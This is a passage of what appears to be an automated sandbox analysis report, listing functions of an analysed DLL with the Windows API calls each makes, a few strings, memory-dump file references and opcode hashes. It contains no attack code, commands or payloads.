VariantInit.OLEAUT32(?), ref: 6CF1C089
VariantClear.OLEAUT32(?), ref: 6CF1C312
VariantClear.OLEAUT32(?), ref: 6CF1C319
VariantClear.OLEAUT32(?), ref: 6CF1C320
VariantClear.OLEAUT32(?), ref: 6CF1C327

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 925485799011f11ef21f6e22cf76ad217aea893eee447ebf163efdd24dba261e
Instruction ID: ef06cf9e1cc68e0996ed47553f1109d87ca9521e630e3687e8bb8d90431c2703
Opcode Fuzzy Hash: 925485799011f11ef21f6e22cf76ad217aea893eee447ebf163efdd24dba261e
Instruction Fuzzy Hash: 08C156726087409FC301EF68C88095BFBE5BFC9708F258A5DE5989BB64D731E845CB92

Function 6CF26B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CF26C8B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CF26CA6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CF26CC7

Part of subcall function 6CF25760: std::tr1::_Xweak.LIBCPMT ref: 6CF25769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF26CF9

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF26F13
InterlockedCompareExchange.KERNEL32(6CFAC6A4,45524548,4B4F4F4C), ref: 6CF26F34

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID:
API String ID: 2722669376-0
Opcode ID: 7f51ef32d5f0365c00ff9a8e66e8e46ae0972f1406e6471d0b043673a51f3b5a
Instruction ID: ea1112a4743e1d43b579be5c76628e36103187ac1dae9099398c2b88c9056ad5
Opcode Fuzzy Hash: 7f51ef32d5f0365c00ff9a8e66e8e46ae0972f1406e6471d0b043673a51f3b5a
Instruction Fuzzy Hash: BFD1BFB1A102059FDB10CFE4C890BEE77B8EF45308F148569E905EBB91E779E944CBA1

Function 6CF116B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::tr1::_Xweak.LIBCPMT ref: 6CF11B53
std::_Xinvalid_argument.LIBCPMT ref: 6CF11B5D
std::exception::exception.LIBCMT ref: 6CF11C43
__CxxThrowException@8.LIBCMT ref: 6CF11C58

Strings

invalid vector<T> subscript, xrefs: 6CF11B58

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
String ID: invalid vector<T> subscript
API String ID: 3098024973-3016609489
Opcode ID: 74bbde36bb349278abe5b372244b3d751014d8fc3f450fbd393a0ce20078ce34
Instruction ID: 6c53a21002b5f42eabc2527bcadb190dbb4aa26fe6fec5b9c69298b4f1647837
Opcode Fuzzy Hash: 74bbde36bb349278abe5b372244b3d751014d8fc3f450fbd393a0ce20078ce34
Instruction Fuzzy Hash: 0B222A75C007099FCB14CFA4C4809EEBBF5BF44314F158A5ED55AABB50E774AA88CB90

Function 6CF1DB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6CF231EC), ref: 6CF1DB5E
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF1DB6E
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF1DB82
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF1DBF1
VariantClear.OLEAUT32(?), ref: 6CF1DBFB

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
String ID:
API String ID: 182531043-0
Opcode ID: d9e43e73e2d0c0c1732b1648d4365d41fab49040f9adad71f2440e0c2a753329
Instruction ID: 848120c5dbc2575ddaf557de23db3c19aacaebdb84af3a76ce6887d226d5baab
Opcode Fuzzy Hash: d9e43e73e2d0c0c1732b1648d4365d41fab49040f9adad71f2440e0c2a753329
Instruction Fuzzy Hash: EE31D07AA05205AFCB01DF54C844EEEBBF8FF8A710F11825AE911A7B40D734A901DBA0

Function 6CF6A42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__CRT_INIT@12.LIBCMT ref: 6CF6A463
__CRT_INIT@12.LIBCMT ref: 6CF6A493
__CRT_INIT@12.LIBCMT ref: 6CF6A4B3

Strings

a0, xrefs: 6CF6A4FF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: T@12
String ID: a0
API String ID: 456891419-3188653782
Opcode ID: 7557ad35526830d73d195a2d1550877e918bc9953b579a4feb2ab07d0b6845c9
Instruction ID: 9f979e432c70747d8dd086809a322f8385dd1ca1337d9701a01a0899623bd1c4
Opcode Fuzzy Hash: 7557ad35526830d73d195a2d1550877e918bc9953b579a4feb2ab07d0b6845c9
Instruction Fuzzy Hash: 6E113A70D0227666DB309AB74C4CFAFBAFC9F82758F109514E525E6D51E738C941CA60

Function 6CF69BB5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CF69BCF

Part of subcall function 6CF69D66: __FF_MSGBANNER.LIBCMT ref: 6CF69D7F
Part of subcall function 6CF69D66: __NMSG_WRITE.LIBCMT ref: 6CF69D86
Part of subcall function 6CF69D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CF69BD4,6CF01290,A64A5C11), ref: 6CF69DAB

std::exception::exception.LIBCMT ref: 6CF69C04
std::exception::exception.LIBCMT ref: 6CF69C1E
__CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: f75e62f72b19fb2e9bb0e4c5ea1ce2c7cc5792b461cc7b8f12a0a23e8e9a6cc4
Instruction ID: 822b3d7133b4cec96ad7ff51ffe9962ab6c339bcc9d7719764c9ca521708625e
Opcode Fuzzy Hash: f75e62f72b19fb2e9bb0e4c5ea1ce2c7cc5792b461cc7b8f12a0a23e8e9a6cc4
Instruction Fuzzy Hash: DDF0FF3291110EEADF04EBA6DC11B9DBAF8EB4272CF140818E40092E90DF718B489754

Function 6CF16C60 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CF16C73
SafeArrayAccessData.OLEAUT32(00000000,6CF16C3C), ref: 6CF16C87
_memmove.LIBCMT ref: 6CF16C9A
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF16CA3

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
String ID:
API String ID: 3147195435-0
Opcode ID: bb9d59b23e68f0f80cd34dfd27fdf68735e31b8f3cbbdd13364bf4627b51a81d
Instruction ID: 9b179454de9e32cfcbedd86d64536f02c3c9acac80b93b5e8458676af262cd2c
Opcode Fuzzy Hash: bb9d59b23e68f0f80cd34dfd27fdf68735e31b8f3cbbdd13364bf4627b51a81d
Instruction Fuzzy Hash: 18F05E75315214BBEB119F51DC89F973FBCEF86761F018015FA188A680E770D5009BA1

Function 6CF31FD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF32206
__CxxThrowException@8.LIBCMT ref: 6CF32221

Part of subcall function 6CF36480: __CxxThrowException@8.LIBCMT ref: 6CF36518
Part of subcall function 6CF36480: __CxxThrowException@8.LIBCMT ref: 6CF36558

Strings

ILProtector, xrefs: 6CF32045

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw$_mallocstd::exception::exception
String ID: ILProtector
API String ID: 84431791-1153028812
Opcode ID: ebafb8d7f99618b9c6305d516ed2836c6f95febedab37cadf7dd40ec192bcfa5
Instruction ID: 3556771d8588b55c547a07c2e944eaabd6b9c147d6d4c898a8a05535547f50d4
Opcode Fuzzy Hash: ebafb8d7f99618b9c6305d516ed2836c6f95febedab37cadf7dd40ec192bcfa5
Instruction Fuzzy Hash: 28712875E05259DFCB54CFA8C844BEEBBB4FB49304F1081A9E40AA7740DB316A48CF91

Function 6CF19110 Relevance: 5.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF1913B
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF1915C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6CF19170
LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CF19191

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e5625fef822b79791c23843686132c94f729b3e2b5956c7f3b142b18c757b8b7
Instruction ID: 8e3f72988095a7645b28d8d6fa827e0574ce691575dbc772910ac59d24a15131
Opcode Fuzzy Hash: e5625fef822b79791c23843686132c94f729b3e2b5956c7f3b142b18c757b8b7
Instruction Fuzzy Hash: 2F4131769042099FCB04DF95D9848EEBBB4FF49214B61855ED816ABB10D730AA05CFE1

Function 6CF18E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6CF18E89
LeaveCriticalSection.KERNEL32(?,00000000), ref: 6CF18EAD
_memset.LIBCMT ref: 6CF18ED2

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID:
API String ID: 3751686142-0
Opcode ID: 4ade5b6e758082ab3bb806f96c2816696e488ce4f321dbe615f1d1113f24cef4
Instruction ID: 927a4668e8b1ad8d76e4749266ff52053e523f7a82f83f46dae91011e5579828
Opcode Fuzzy Hash: 4ade5b6e758082ab3bb806f96c2816696e488ce4f321dbe615f1d1113f24cef4
Instruction Fuzzy Hash: 35518CB4A05205EFC744CF58C990F9AB7B6FF89304F21815DE91A8BB81CB31EA55CB90

Function 6CF1D920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CF1D949
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CF1D96C
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF1D9CF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: ac8386dcd00744a9e0144e51e1383b1f7605d453d356d334018ae75f12d8c315
Instruction ID: 8c0ce1075fb1a8f1c6eef916092a1e32708e0d473afba9c13f5c1e227308ce94
Opcode Fuzzy Hash: ac8386dcd00744a9e0144e51e1383b1f7605d453d356d334018ae75f12d8c315
Instruction Fuzzy Hash: 05219D35605618AFEB12CF98CC94FAB77B8EF8A744F104198E944DB784D771E901CBA1

Function 6CF2DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF2DB2D
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF2DB45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF2DBA2

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: d750aa6a491fe80ec9d0b5d0827661c2429e4d39f4e35ba946d659dc800fa04b
Instruction ID: 7c18e1959dcf33e9588f039c2a43d96b4294248ad10902fec8ec3871bf76f347
Opcode Fuzzy Hash: d750aa6a491fe80ec9d0b5d0827661c2429e4d39f4e35ba946d659dc800fa04b
Instruction Fuzzy Hash: AC119075646205AFD700DF69C898F9ABBB8FF5A314F058159E908DB341D730A800CBA0

Function 6CF33EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF34042

Part of subcall function 6CF69533: std::exception::_Copy_str.LIBCMT ref: 6CF6954E

__CxxThrowException@8.LIBCMT ref: 6CF34059

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C04
Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C1E
Part of subcall function 6CF69BB5: __CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 2813683038-0
Opcode ID: 529bc7aa6b10a83e2b7d027a699da674d49d65588090ec66ad76f77836478612
Instruction ID: 6617399ea24500497abcf27b1eccd2c3b6e8eb0fbb8b480e92d146a0ca95e4e7
Opcode Fuzzy Hash: 529bc7aa6b10a83e2b7d027a699da674d49d65588090ec66ad76f77836478612
Instruction Fuzzy Hash: 8191C4B1904700AFD700CFA9C841B9AFBF8FF85344F15895AE4189BBA0D7B1D608CB92

Function 6CF1BDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF1BE2D
IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6CF1BE6D

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
